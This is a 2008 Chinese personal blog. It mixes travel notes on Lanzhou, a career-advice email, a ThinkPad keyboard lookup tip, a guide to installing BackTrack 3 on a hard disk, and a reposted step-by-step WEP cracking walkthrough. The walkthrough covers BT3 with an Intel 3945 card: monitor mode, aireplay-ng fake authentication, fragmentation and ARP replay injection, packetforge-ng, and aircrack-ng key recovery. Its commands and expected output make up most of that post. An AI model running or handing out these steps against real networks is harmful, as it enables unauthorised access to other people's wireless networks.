2008年12月26日星期五

机器自带的intel网卡破解WEP(转文)

BT3下Intel Proset 3945abg网卡破解wep实战
2008-09-10 20:41:42 浏览(6239)

注1:经过N天的实际操作,无客户端的WEP破解基本上是无法实现的(运行airodump-ng �ivs �w abc(abc是存盘的文件名)
-c (channel号) 网卡名时#data数为0)。

注2:无客户端的概念:只有AP开着,AP下没有任何有线或无线的网络连接。

注3:BT3下运行Kismet的方法:

#ifconfig wlan0 up

#airmon-ng

显示无线网卡为iwl3945

#modprobe �r iwl3945

#modprobe ipwraw

#iwconfig

显示无线网卡已变成wifi0、monitor mode

编辑/usr/local/etc/kismen.conf文件,把source改为source=iwl3945,wifi0,Intel

存盘。

#kismet

用"s"、"f"、"i"显示单个AP的详细信息。


1. 环境:DELL M1210、Intel Proset 3945 a/b/g无线网卡

2. 下载BT3,解压到U盘(根下BOOT、BT3目录)

3. 运行BOOT下的bootinst.bat,制作U盘启动

4. reboot PC,按F12进入BOOT MENU,选USB

5. 进入BT3菜单,选BT3 Graphics mode (compiz Nvidia)-Experimental

6. 打开一个shell

7. #ifconfig �a(记下本机网卡MAC)

8. 显示无线网卡为wlan0

9. #ifconfig wlan0 up

10. #airmon-ng

11. 显示无线网卡为iwl3945

12. #modprobe �r iwl3945

13. #modprobe ipwraw

#airmon-ng start wifi0 6 将网卡设置成AP监听模式


14. #iwconfig

15. 显示无线网卡已变成wifi0、monitor mode

继续:


1. # airodump-ng --ivs -w name -c 6 wifi0(name是存盘的文件名,6是cannel号)

2. 显示要破解的ap的essid 和mac ,并记下ap的essid 和mac。(#data为0时则为无客户端AP,不能继续)

3. 不关闭这个shell,另开一个shell

4. #aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac wifi0

5. 显示以下信息则为成功

Sending Authentication Request

Authentication successful

Sending Association Request

Association successful :-)

21.#aireplay-ng -5 -b ap的mac -h 自己网卡的mac wifi0来获得xor文件

如果一切顺利,系统将显示

Use this packet ?

输入y回车,将得到一个xor文件(以fragment开头)

再输入ls 查看当前目录,你将看到刚才生成的一个后缀名为xor 的文件。

22.#packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 255.255.255.255 -l
255.255.255.255 -y fragment -****-****.xor -w mrarp
其中,-l中的l是L的小写,别和1混淆,而其中的fragment-****-****.xor是刚才生成的文件名。

系统显示:Wrote packet to: mrarp

23.#aireplay-ng -2 �r mrarp -x 1024 wifi0(-x 1024 是限定发包速度,避免网卡死机,选择1024)

输入y回车

前面的抓包窗口上的#data将迅速增加

24.另开shell

25.#wesside-ng �i wifi0 �v ap的MAC,破解完成。

26.到#data增加到3万以上时,另开shell

27.#aircrack-ng -n 64 -b ap的mac name-01.ivs

其中64是64位密码,如果是128位,换成128即可。

(注:摘之网文,还有许多破解方法,破解步骤都差不多,要灵活变通,如有疑问,请多交流.)

蓝色命令为主要执行命令
投稿:技术
评论(1) | 浏览(6239) | 收藏到我的网摘 | 邀请好友阅读

给兄弟的邮件,如何保持自己的快速成长

1、观察一个项目是如何操作下来的,怎么谈,怎么实施,怎么验收、回款,如何打出自己的影响,发展人脉
2、项目前期,如何与客户交流需求,收集相关资料,协调公司资源
3、实施过程中,如何协调自己能掌握的资源,做好项目组内各人的配合,有完善实施计划和总结。
4、项目结束,如何验收,快速回款。找机会把项目延续下来,二期三期都能让客户主动找上来,不用再花费太多的市场费用 。
在大公司,可以学到很多东西,工程技能、思考方法、人脉、成熟客户、项目管理.....认真做好每一件事,每一刻都要观察和学习、思考,永远不懒散,保持上进。

对这些东西上心一些,过段时间到我公司里来吧。

2008年12月14日星期日

如何确定,自己笔记本用的是不是最好键盘?

搜了一个晚上,看看自己的小黑,用的是哪种键盘。
手感排名为NMB, ALPS, Chicony
国内许多机器,用的是chicony,好像称为群光,手感很差。

如何不用拆机,查看自己用的是哪种键盘型号呢?

首先,看看自己的机器型号,如 x60s,xxxx-xx
然后找到sn号,都在机器背后 L3-XXXX类似的东西。

到这个网站http://www-3.ibm.com/pc/support/site.wss/warranty/warranty.vm
我主要时间都在等待这人网站的反应了,半天没有连上,以前有时连接时,速度还是挺快的,不知道今天为何速度这么慢。把上面的机器型号和SN号,都填入然后搜索

在下面的选 View parts lookup results for this system
找一下FRU-KS KBD的字样,看到NMB字样了吗?

恩,如何没有这样的字体,抄下那个FRU号码,再到另一个网页具体查看吧
http://www-307.ibm.com/pc/support/site.wss/document.do?sitestyle=lenovo&lndocid=MIGR-62916

虽然查出来,但感觉也并不象吹牛般那样好,显然不如我的cherry键盘。走了,该去锻炼了

2008年12月10日星期三

兰州印象

早上7点,所有人都在睡觉。昨晚上0点以后才睡。早上起来,写一下初到兰州几天的印象。

兰州的空气很差,灰尘比济南还多,空气中弥漫着一种化工或油气的味道。当地消费也是两极分化。平时吃饭,在好的饭店要上一桌子饭菜,一般二百来钱。平时到小店吃饭,都是去干净装修比较好的,一般是三五块钱,有时是当地有名的兰州拉面,有时是肉包粥菜,有时是烧烤(这个稍贵),不比感觉比东部沿海城市的消费,要低很多。东部的收入,拿到这边来花,还是比较爽的。


在住的地方周围逛了逛。整个城市,尤其是中心部位感觉很小,整个市中心,无论从哪头逛,走着都是一二十分钟的路程,永昌路向北,是水势汹涌的黄河。接近黄河边上,有一条东西走向的步行街,名字叫张掖路。非常宽,没有行车,路两边商铺大厦林立,西边有亚欧商厦,西单商厦什么的,向东有百安百货大楼、电子科技大楼什么的,再向东走几个路口,不远就是城边,东方广场,据说旁边的国防百盛商场,东西便宜货又好,没有假货。这是出租车司机师傅的原话。繁华的地方不是很多,只集中在上面这几个地方。尤其是张掖路上最热闹,在靠近永昌路的地方,还有兰州的城隍庙,主要经营古玩字画一类。进入看了看,整个庙保存非常完好,古老的建筑,让人感觉一新,各处屋檐调角墙壁,还有大梁雕刻什么的,在其它地方都看不到。许多地方都是现在人修葺的,已经丢失了大部分古味。这儿却保存的很好,整个大院独立成体,大殿偏房、各处细节,都和昨天刚刚换了住户一般。这也正是让人痛苦的地方。看上面,城隍庙古香古色,看下来却是吆喝着赚钱的小贩,要保持那份欣赏的感觉,实在不容易。


兰州消费不高。平时吃饭,3块钱就能到干净的小店吃的很饱,还是当地特色小吃。卖衣服的店铺,打了促销的牌子,都是30-40块一件。到店里看当地的那种牛皮鞋,一般不会超过150。然而去了一趟亚欧商厦,却看到一个简单的钱包,价格是
2690元。也许和全国各地一样,都有生活在不同境地人们,有的为了生计拼搏,有的却毫无消费上的顾虑。


这样的城市,晚上却很热闹。尤其是永昌路,天一落黑,大街上就挤满了卖各色货品的小摊和行人。再向北,靠近黄河的地方,有各种好点儿的饭店、酒吧、舞厅、KTV什么的,到了晚上0点过后,大街上还有许多人,三三两两地走着。出租车来来去去,繁忙地拉着客人,饭店里还坐着吃饭或聊天的人们。这样一个贫穷的城市,让人恍惚间以为到了广州深圳。

2008年12月4日星期四

硬盘安装liveCD

硬盘安装livecd

有很多的liveCD,是系统维护的好工具。比如无线破解的BT3、BT2,全称为backtrack3,只一张光盘,提供了大量的工具,更对无线破解集成了许多很棒的工具套件。其它,还有damm
small linux,knoppix,bootCd,Zlinux,pfsense,mono,winpe,蓝色火焰,星星雨。。。种类非常多,每一种都不可缺少,提供的功能都不可替代。但这些好工具是压缩集成在光盘上的,想把现成的工具光盘安装到硬盘,需要一定的操作经验。硬盘安装liveCD是个非常有用的功能,但一般操作起来会非常麻烦,经验不足会面临不少的失败阻碍。

下面以backtrack 3的安装为例,说明这种安装常用的步骤和注意事项。
backtrack3是slax为母盘定制的,其实是slackware
12.0修改过来的。现在使用slackware的人非常少了,这种linux版本,更接近bsd的风格,与传统unix的文件结构更加接近。现在流行的ubuntu,redhat,红旗一类,似乎是system
V的文件结构形式,使用了大量的配置工具,打包的系统文件特别臃肿,光安装盘就有好几张光盘。系统速度慢,垃圾文件多。象damm small
linux为代表的这类工具,大小只有50MB,包含了常用的功能,上网的firefox,收邮件,听歌,看电影,办公,聊天。。。。还有什么来着?常用的工具都全了。而BT3不光这个,还提供了开发工具,编译程序,系统源码,成千上万的黑客工具套件,简直应用尽有了。

如何把这些好工具安装到硬盘上面呢?
其实BT3提供了安装向导,但经常会安装失败,有时还会把主分区表破坏,最后整个硬盘只有BT3,我们肯定不想发生这种情况。下面看看如何更快更好地手动安装,保证不会破坏分区表,而且可以多种系统并存。可以在xp下引导bt,也可以在Bt下面引导xp。
首先,最简单的办法。xp下面,安装grub4dos这个工具,只有几十kb大小,我们只拿其中的三个文件。grldr,menu.lst,还有一个grldr.mbr,好像最后这个文件不用也可以。我没试过,照操作来的。然后修改windows的下boot.ini文件。在里面加一行
c:\grldr="my BackTrack3"就可以了。另外,还需要修改menu.lst,这个文件的用法和在linux下面一样,并且提供了许多示例。对于BT3,我们需要添加这样一行记录:
title my BackTrack3
root(hd0,0) (这儿要看安装到在哪个分区)
kernel /boot/vmlinuz max_loop=255 initrd=initrd.gz init=linuxrc
load_ramdisk=1 prompt_ramdisk=0 ramdisk_size=6666 root=/dev/ram0 rw
initrd /boot/initrd.g
boot

把上面几行放到menu.lst里面,就可以引导了。网上还有制作制作精美的一个引导文件,grbt3,另外还加上漂亮的背景,以及中文字体。

这种方法的缺点,是每次引导后,操作记录都无法存盘。因为一切都模拟的光盘,所以每次系统重启后,我们相当于都使用一个完全的新系统,有些类似系统还原卡的原理。另外,在iso文件中的bt3/modules中,只要添加一个别人制作好的lzm文件,就可以对整个系统完成汉化。倒也快捷方便。从这二个方面说,也算是个挺好的优点吧。

下面说第二种方案,把整个BT3安装到硬盘的linux
ext2分区中。说到这儿,想起来,BT3的系统安装程度,似乎把分区设置为ext3格式。不大喜欢这种格式,尤其在个人用的机器上,还是ext2来的实在些。呵呆。
最初的步骤,和一般的linux安装完全一样,硬盘分区格式化什么的,网上有大量的文章讲这些。实在不会,找个图形化的操作工具,如pq一类,照图画猫,几下就可以分好区。下面只说关键的部分。
使用bt3的光盘引导后。将硬盘划好的分区,mount到本地。
1.mkdir /mnt/hda2
2.mount /dev/hda2 /mnt/hda2
3.开始复制
cp --preserve -R
/{bin,boot,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/hda2/
,视机器速度而定,我的pII 300的老机器,安装了不到十分钟就完成了。下面的几步就快了,几条命令就可以完成。
4.mkdir /mnt/hda2/{sys,mnt,proc,tmp}
5.mount --bind /dev /mnt/bt3/dev
6.mount -t proc proc /mnt/hda2/proc
7.chmod 777 /mnt/hda2/tmp
完成上面几步,再转换环境,把目标分区去操作
chroot /mnt/hda2 /bin/bash
vi /etc/fstab 根本以后系统使用时的实际情况修改。原来启动系统的分区,都是光盘相关的,这时,一定要改为自己刚刚划分好的分区相关的信息。如刚划分的hda2,文件原为光盘相关的cd0
vi /etc/lilo.conf
这是系统引导文件,跟上面提到的grub有些类似,是稍早一些的引导程度。也非常容易修改,只要把lilo.conf文件中,关于hda的,改为相应的分区命名文字就可以了。
如,硬盘在刚才的分工名,是hda2,就把硬盘设置为hda,label1=bt3,把windows的记录也加进来。label=windows。这方面的文章,网上也非常多。不会的google一下lilo.conf
修改完后,lilo -v,可以看到成功信息:
Add BT3
Add windows
就说明成功。reboot后,就可以轻松享受自己的硬盘版BT3了。同理,照上面的操作,也非常制作出适合自己的U盘版本BT3,u盘版本的各种轻量化小工具集的OS。

先写到这儿,小宝宝睡醒了。正呀呀地朝爸爸招呼呢